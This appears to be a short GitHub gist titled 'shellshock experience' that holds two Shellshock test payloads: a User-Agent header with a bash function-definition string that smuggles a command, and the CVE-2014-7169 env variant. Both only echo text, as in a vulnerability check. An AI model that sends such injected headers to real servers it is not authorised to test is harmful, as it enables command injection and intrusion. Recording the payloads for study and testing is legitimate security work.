Created
March 29, 2021 11:22
-
-
Save tanaka-geek/df93061f45f8073cc426694533ecbd0e to your computer and use it in GitHub Desktop.
shellshock experience
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
User-Agent: () { :;}; /bin/bash -c "echo this is vulnerable" | |
env CVE_2014_7169='() { (a)=>\' bash -c "echo date"; cat echo |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment